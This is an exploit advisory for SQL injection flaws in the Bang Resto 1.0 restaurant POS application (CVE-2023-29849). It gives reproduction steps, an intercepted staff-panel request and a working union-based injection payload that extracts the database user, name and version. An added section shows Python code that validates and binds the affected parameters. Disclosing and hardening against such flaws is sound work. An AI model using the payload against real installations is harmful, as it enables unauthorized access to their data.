Bang Resto 1.0 SQL Injection

Bang Resto version 1.0 suffers from multiple SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to nu11secur1ty in December of 2022.

Packet Storm
# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link: https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29849

*Affected Parameters:*
btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[], itemqty[], btnMenuItemID

*Steps to Reproduce:*
1. First log in to your staff panel.
2. Then go to the "order" menu, select a menu item, create an order and intercept the request data using Burp Suite. Your request data will be:

POST /bangresto/staff/displayitem.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 194
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/staff/order.php
Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5
Connection: close

btnMenuItemID=1&qty=1

3. The "btnMenuItemID" parameter is vulnerable. Let's try to inject a union-based SQL injection using this query ".1 union select 1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())---" in the "btnMenuItemID" parameter.
4. Check the browser; you will see the user, database and version information.
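The defect class the advisory reports is request parameters such as btnMenuItemID reaching the SQL text without validation or binding. The following is an added example (not Bang Resto's own code, which is PHP) of how the displayitem handler's input handling can be hardened: the affected parameters named above are allow-listed as bare positive integers, and the value is then bound as a query parameter. Python with an in-memory SQLite table stands in for the PHP/MySQL stack; the table and column names are assumptions, since the real schema is not on the page.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for the menu table displayitem.php reads; the real
# Bang Resto schema is not on the page, so these names are assumptions.
SCHEMA = """
CREATE TABLE menu(itemID INTEGER PRIMARY KEY, itemName TEXT, itemPrice REAL);
INSERT INTO menu VALUES (1, 'Nasi Goreng', 25000), (2, 'Es Teh', 5000);
"""

# Integer-only parameters taken from the advisory's affected-parameter list
# (plus qty, which appears in the captured request body).
INT_PARAMS = {"btnMenuItemID", "itemID", "menuID", "staffID",
              "qty", "itemID[]", "itemqty[]"}
POSITIVE_INT = re.compile(r"[1-9][0-9]{0,9}")   # bare positive integer only


def parse_order_body(body: str) -> dict:
    """Decode the x-www-form-urlencoded body and allow-list every integer
    parameter. A value like '.1 union select ...' fails here, before any
    SQL is built, so the union payload never reaches the database."""
    params = parse_qs(body, keep_blank_values=True, strict_parsing=True)
    clean = {}
    for name, values in params.items():
        if name in INT_PARAMS:
            for v in values:
                if not POSITIVE_INT.fullmatch(v):
                    raise ValueError(f"{name}: expected a positive integer")
            clean[name] = [int(v) for v in values]
        else:
            clean[name] = values
    return clean


def display_item(conn, body: str):
    """Hardened displayitem handler: the validated id is bound with '?', so
    the driver treats it as data, never as part of the SQL statement."""
    clean = parse_order_body(body)
    item_id = clean["btnMenuItemID"][0]
    cur = conn.execute(
        "SELECT itemID, itemName, itemPrice FROM menu WHERE itemID = ?",
        (item_id,),
    )
    return cur.fetchall()


def open_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn
```

Calling `display_item(open_sample_db(), "btnMenuItemID=1&qty=1")` returns the single menu row, while the advisory's union payload in the same field raises `ValueError` at validation time.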

Related news

CVE-2023-29849

Bang Resto 1.0 was discovered to contain multiple SQL injection vulnerabilities via the btnMenuItemID, itemID, itemPrice, menuID, staffID, or itemqty parameter.
